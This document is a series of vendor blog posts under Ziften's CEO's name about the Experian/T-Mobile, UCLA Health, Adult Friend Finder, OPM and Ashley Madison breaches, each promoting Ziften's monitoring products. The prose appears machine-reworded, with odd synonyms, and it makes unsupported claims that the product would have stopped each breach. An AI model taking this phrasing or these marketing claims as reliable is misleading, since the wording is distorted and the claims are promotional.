Charles Leaver – Utilizing Continuous Monitoring Will Enable Experian To Learn From Previous Mistakes

Written By Josh Applebaum And Presented By Charles Leaver Ziften CEO

Experian Need To Learn from Mistakes Of The Past And Implement A Continuous Monitoring Solution

Working in the security sector, I’ve constantly felt my job was hard to explain to the average individual. Over the last few years, that has altered. Sadly, we are seeing a brand-new data breach revealed every couple of weeks, with a lot more that are kept secret. These breaches are getting front page attention, and I can now discuss to my friends what I do without losing them after a few sentences. Nevertheless, I still question what it is we’re gaining from all this. As it turns out, numerous companies are not learning from their own errors.

Experian, the international credit reporting firm, is a business with a lot to learn. A number of months ago Experian revealed it had actually discovered its servers had actually been breached and that consumer data had been taken. When Experian announced the breach they assured clients that “our consumer credit database was not accessed in this event, and no payment card or banking info was taken.” Although Experian made the effort in their statement to reassure their consumers that their financial info had actually not been taken, they elaborated further on what data in fact was taken: customers’ names, addresses, Social Security numbers, birth dates, driver’s license numbers, military ID numbers, passport numbers, and extra info utilized in T- Mobile’s own credit evaluation. This is frightening for 2 reasons: the very first is the type of data that was stolen; the second is that this isn’t really the very first time this has taken place to Experian.

Although the cyber criminals didn’t walk away with “payment card or banking information” they did leave with personal data that could be exploited to open new credit card, banking, and other monetary accounts. This in itself is a reason the T-Mobile consumers included ought to be concerned. Nevertheless, all Experian clients must be a little nervous.

As it turns out, this isn’t the very first time the Experian servers have been jeopardized by hackers. In early 2014, T-Mobile had announced that a “reasonably small” number of their consumers had their personal details taken when Experian’s servers were breached. Brian Krebs has a really well-written blog post about how the hackers breached the Experian servers the first time, so we won’t enter into excessive detail here. In the very first breach of Experian’s servers, hackers had actually made use of a vulnerability in the company’s support ticket system that was left exposed without initially requiring a user to authenticate before utilizing it. Now to the frightening part: although it has actually ended up being widely known that the hackers made use of a vulnerability in the organization’s support ticket system to gain access, it wasn’t until right after the second hack that their support ticket system was shut down.

It would be hard to believe that it was a coincidence that Experian decided to take down their support ticket system mere weeks after they announced they had been breached. If this wasn’t a coincidence, then let’s ask: what did Experian find out from the very first breach where consumers got away with sensitive consumer data? Companies who keep their consumers’ delicate details need to be held responsible to not just protect their customers’ data, however if likewise to guarantee that if breached they patch the holes that are discovered while investigating the attack.

When companies are examining a breach (or prospective breach) it is essential that they have access to historic data so those investigating can attempt to piece back together the puzzle of how the attack unfolded. At Ziften, we provide a system that enables our customers to have a continuous, real time view of the whole picture that occurs in their environment. In addition to offering real time visibility for discovering attacks as they occur, our continuous monitoring service records all historical data to allow clients to “rewind the tape” and piece together exactly what had actually occurred in their environment, no matter how far back they have to look. With this brand-new visibility, it is now possible to not only discover that a breach happened, but to likewise discover why a breach happened, and ideally learn from past errors to keep them from taking place again.


Charles Leaver – It Is Time To Learn Lessons From The UCLA Health Data Breach

Written By Craig Hand And Presented By Ziften CEO Charles Leaver

UCLA Health Data Breach Likely Due To Inferior Security

UCLA Health announced on July 17th 2015 that it was the victim of a health data breach affecting as much as 4.5 million healthcare customers from the four healthcare facilities it runs in the Southern California area. According to UCLA Health officials, Personally Identifiable Information (PII) and Protected Health Information (PHI) was accessed but no evidence yet suggests that the data was taken. This data went as far back as 1990. The officials likewise stated that there was no proof at this time, that any credit card or financial data was accessed.

“At this time” is crucial here. The information accessed (or possibly taken, its certainly difficult to know at this point) is practically helpful for the life of that person and possibly still beneficial past the death of that individual. The information offered to the criminals consisted of: Names, Addresses, Telephone numbers, Social Security Numbers, Medical condition, Medications prescribed, Medical treatments performed, and test outcomes.

Little is known about this data breach like so numerous others we find out about however never ever hear any genuine information on. UCLA Health found unusual activity in segments of their network in October of 2014 (although access potentially started one month previously), and right away contacted the FBI. Finally, by May 2015 – a complete seven months later – investigators stated that a data breach had occurred. Once again, officials claim that the enemies are probably highly advanced, and not in the country. Finally, we the public get to hear about a breach a full two months later July 17, 2015.

It’s been said numerous times before that we as security professionals need to be correct 100% of the time, while the bad guys only need to find that 1% that we may not be able to correct. Based on our investigation about the breach, the bottom line is UCLA Health had poor security practices. One factor is based on the easy reality that the data accessed was not encrypted. We have had HIPAA now for some time, UCLA is a well renowned bastion of Higher Education, yet still they cannot safeguard data in the simplest ways. The claim that these were highly sophisticated individuals is likewise suspect, as so far no genuine proof has been disclosed. After all, when is the last time that an organization that has been breached declared it wasn’t from an “advanced” attack? Even if they declare they have such proof, as members of the public we won’t see it in order to verify it properly.

Considering that there isn’t enough divulged details about the breach, its challenging to figure out if any service would have assisted in finding the breach earlier instead of later on. However, if the breach began with malware being delivered to and launched by a UCLA Health network user, the probability that Ziften might have assisted in discovering the malware and possibly stopping it would have been reasonably high. Ziften might have likewise alerted on suspicious, unknown, or known malware along with any interactions the malware may have made in order to spread out internally or to exfiltrate data to an external host.

When are we going to learn? As we all understand, it’s not a matter of if, however when, companies will be breached. Smart companies are preparing for the unavoidable with detection and response systems that reduce damage.


Charles Leaver – Adult Friend Finder Data Leak Preventable With Superior Endpoint Security

Written By Chuck McAuley And Presented By Charles Leaver Ziften CEO

Endpoint Security Is The Best Friend For Adult Friend Finder

Adult Friend Finder, an online “dating service” and its affiliates were hacked in April. The leaked information consisted of charge card numbers, usernames, passwords, birth dates, physical addresses and individual – you know – choices. What’s often not highlighted in these cases is the monetary value of such a breach. Numerous would argue that having an email address and the associated data might be of little worth. However, the same way metadata collection provides insight to the NSA, this kind of info offers attackers with plenty of leverage that can be utilized against the public. Spear phishing becomes a lot simpler when enemies not only have an e-mail address, but also place, language, and race. The source IP addresses gathered can even offer exact street locations for cyber attacks.

The attack method released in this example was not released, however it would be reasonable to presume that it leveraged a kind of SQL Injection attack or comparable, where the data is wormed out of the back-end database through a flaw in the web server. Another possible methodology might have been hijacking ssh keys from a jeopardized admin account or github, but those tend to be secondary in most cases. Either way, the database dump itself is 570 Mb, and presuming the data was exfiltrated in a few large transactions, it would have been very visible on a network level. That is, if Adult Friend Finder were utilizing a system that supplied visibility into network traffic.

Ziften ZFlow ™ makes it possible for network visibility into the cloud to catch aberrant data transfers and credit to specific executing processes. In this case, the administrator would have had 2 opportunities to notice the irregularity: 1) At the database level, as the data was extracted. 2) At the web server level, where an irregular amount of traffic would be sent to a particular address. Organizations like Adult Friend Finder should get the required endpoint and network visibility required to secure their consumers’ personal data and “hook up” with a company like Ziften.


Charles Leaver – A Personal Perspective On The Biometric Data Compromise From The OPM Breach

Written By Mike Hamilton And Presented By Ziften CEO Charles Leaver


Enhanced Security of Personal and Biometric Data Is Needed After OPM Breach



Just recently, I had to go through a fairly comprehensive background check procedure. At the time it was among those situations where you sign into the portal, provide your social security number, a myriad of delicate info about you and your household, and trust the government (and their specialists) to take care of that individual data.

As I got home the other night and sat down to begin composing this article, I took a look at the stack of mail laying on my desk and noticed one of those envelopes with the perforated edges that generally include sensitive details.

Naturally, you have to open those types of envelopes. Sadly at that time all my worst fears had become a reality.

What I found was my very own letter detailing that basically every sensitive piece of information one may would like to know about me – in addition to comparable details on 21 million other Americans – was accessed during the OPM breach.




Oh, and incidentally, there’s the problem that my biometric identity was likewise compromised:




At this moment, despite the fact that “federal specialists” believe that it’s not a major issue, my iPhone disagrees with them. Bruce Schneier composed an outstanding piece on this, so I won’t belabor the points he makes. But at some point we all have to ask some tough questions:

When is this going to stop?

Who is accountable for stopping it?

Who is going to really stop it?

Who is going to be held responsible when breaches occur?

These types of cyber attacks are why we at Ziften are so passionately constructing our next-generation security tools. While we as a security community might never ever totally stop or avoid these kinds of breaches from happening, maybe we can make them so much harder and time consuming. When you think about it, until the community states “we can’t take anymore” this is going to continue to take place on a daily basis.

Charles Leaver – Endpoint Security From Ziften Could Have Prevented Data Breach At Ashley Madison

Written By Michael Vaughn And Presented By Charles Leaver Ziften CEO


Life is Too Short to Not Implement Endpoint Security.


Ashley Madison’s tagline is “Life is short. Have an affair.” It appears security falls very short at the business, nevertheless, as millions of client records were publicized for the whole world to see in a recent cyber attack. Publicly, there are just theories as to who precisely breached the scandalous operation. It could have been an inside job. Other parties, such as the infamous hacking group Impact Team, are claiming success over the red-lettered business. However exactly what appears is the publicly-published list of thirty two million user identities. Furthermore, CEO Noel Biderman lost his job, and the organization is tackling an insurmountable variety of legal claims.

It has actually been found that bots were communicating with users, and the number of users included only a small number of women. In a near-comedic style, the site still specifies it was a winner of a “Trusted Security Award” and offers total discretion for its users. Their claim of “Over 42,705,000 anonymous members!” on the home page is as shameful as the service they offer. The stolen list of users is so easily accessible that third parties have actually currently produced interactive sites with the names and addresses of the revealed cheaters. Per Ashley Madison’s media page, they “right away implemented a comprehensive investigation making use of premier forensics experts and other security experts to determine the origin, nature, and scope of this incident.” If Ashley Madison had been more proactive in their approaches of endpoint security, they could have potentially been informed of the breach and stopped it prior to data could have been taken.

Advanced endpoint security and forensic applications – such as those offered by Ziften – could have possibly saved this company from the humiliation it has endured. Not only might Ziften have actually informed security leads of the suspect network activity in the middle of the night of an attack, however it might have prevented a range of actions on the database from being performed, all while letting their security team sleep a little better. Life is too short to let security issues keep you awake during the night.